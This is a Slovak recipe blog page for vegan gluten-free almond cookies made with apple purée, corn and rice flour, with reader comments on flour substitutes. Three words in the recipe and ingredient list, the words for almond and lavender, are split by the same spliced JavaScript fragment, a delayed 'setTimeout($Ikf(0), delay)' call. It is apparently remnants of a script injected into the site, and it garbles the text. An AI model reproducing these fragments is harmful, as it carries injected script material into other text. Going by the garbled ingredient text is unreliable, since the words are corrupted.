Vegánske bezlepkové mandľové sušienky

Keďže stále špekulujem a rada skúšam nové kombinácie, napadlo mi, vyskúšať, ako sa žije vegánom. Reálne, keď si predstavíte, že nejedia všetky tie dobroty, ktoré robia koláče koláčmi a jedlá jedlami, až mi ich je ľúto. Mno, a teda ak ste aj vy zvedaví, aké koláčiky asi jedia, a ešte k tomu máte aj problém s lepkom, tak skúste môj recept na mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľové bezlepkové vegánske sušienky. I keď slovo sušienky pre tieto koláčiky platí asi len prvý deň, lebo potom vďaka ovocnému pyré trošku zvlhnú. Čo im ale na chuti neuberá, takže vrelo odporúčam.

Ingrediencie

  • 80 g pomletých mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlí
  • 55 g muscovado alebo kokosového cukru
  • 1 pl golden ľanových semiačok pomletých na prach
  • ½ kl sódy bikarbóny
  • ½ kl sušenej vanilky
  • 20 ml oleja z hroznových jadierok (môžete použiť aj olivový olej, ale má výraznejšiu chuť. Tak isto môžete použit ghee maslo, alebo maslo, pokiaľ nie ste vegán 😉 )
  • 60 ml jablkového pyré
  • 30 g hladkej kukuričnej múky
  • 30 g ryžovej múky

Postup

  1. Postup je viac než jednoduchý. Všetky ingrediencie spolu zmiešame, urobíme si malé guličky, ktoré pokladáme na plech vystlaný papierom na pečenie a potom ich postupne postláčame na malé placky. Ja ich robievam tak 4-5 mm hrubé, ale urobte si podľa chuti.
  2. „Placky“ môžeme posypať pomletou levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľou a dáme piecť do vyhriatej rúry na 190 stupňov približne 15 minút.

Koláčiky sú vynikajúce k čajíku, alebo len tak do ruky, pre deti. Miuška ich zbožňuje a takmer sme nemali čo odfotiť 😀 Ale podarilo sa mi aspoň pár kúskov zachrániť a fotka sa „Piškótke“ celkom vydarila, čo poviete?

Tak dobrú chuť, moji milí 😉

Ohodnoť Recept

9 komentárov

  1. Mirka, čím by sa dala nahradiť kukuričná muka? mohla by byť napriklad ryžová?

     
    • Ja by som sa toho nebála. Určite to skús a daj mi vedieť 😀 Podľa mňa budú super aj s čisto ryžovou..tie mandle tam udržia správnu textúru. Ale to je len môj predpoklad. Uvidíš na konzistencii cesta, keby bolo príliš riedke, alebo husté, tak pridáš buď pyré, alebo ešte ryžovej múky. 😀 držím palce 😀

       
  2. Ďakujem Mirka 🙂 skusim a uvidime 😉

     
  3. Ďakujem za recept, vyšlo mi 40 kúskov, su tučnejšie a menšie ako Tvoje, ale prudko jedlé!

     
    • Katka, veru, straaasne su dobre 😀 ..Miuška sa za nimi ide potrhať 😀 Som rada, že aj vám chutia 🙂 želám krááásne Vianoce :-*

       
  4. Mirka, vyzerajú úžasne… prosím ťa, nemohla by si spraviť aj takú „podskupinu“ týkajúcu sa delenej stravy, kde by človek hneď našiel príslušný receptík? ďakujem 🙂

     
    • Ahoj 🙂 ako myslis delenej stravy? Rozdelenie podla surovin? 🙂

       
      • Ahoj 🙂 myslela som to tak, že ak sa recept na základe surovín hodí aj k delenej strave, tak by si k nemu pridala aj tag „delená strava“ a bol by ľahšie vyhladateľný. Napr., tieto mandľové sušienky sa tam hodia – do rastlinnej skupiny… Neviem, či som to dobre vysvetlila 😀

         
        • Aha, uz rozumiem 😀 Ale delenej strave sa nevenujem, takze na taketo delenie si netrufam, ale dobre vediet, ze tieto susienky spadaju do delenej stravy 😀

           

Napíš Koment

Vaša e-mailová adresa nebude zverejnená.

*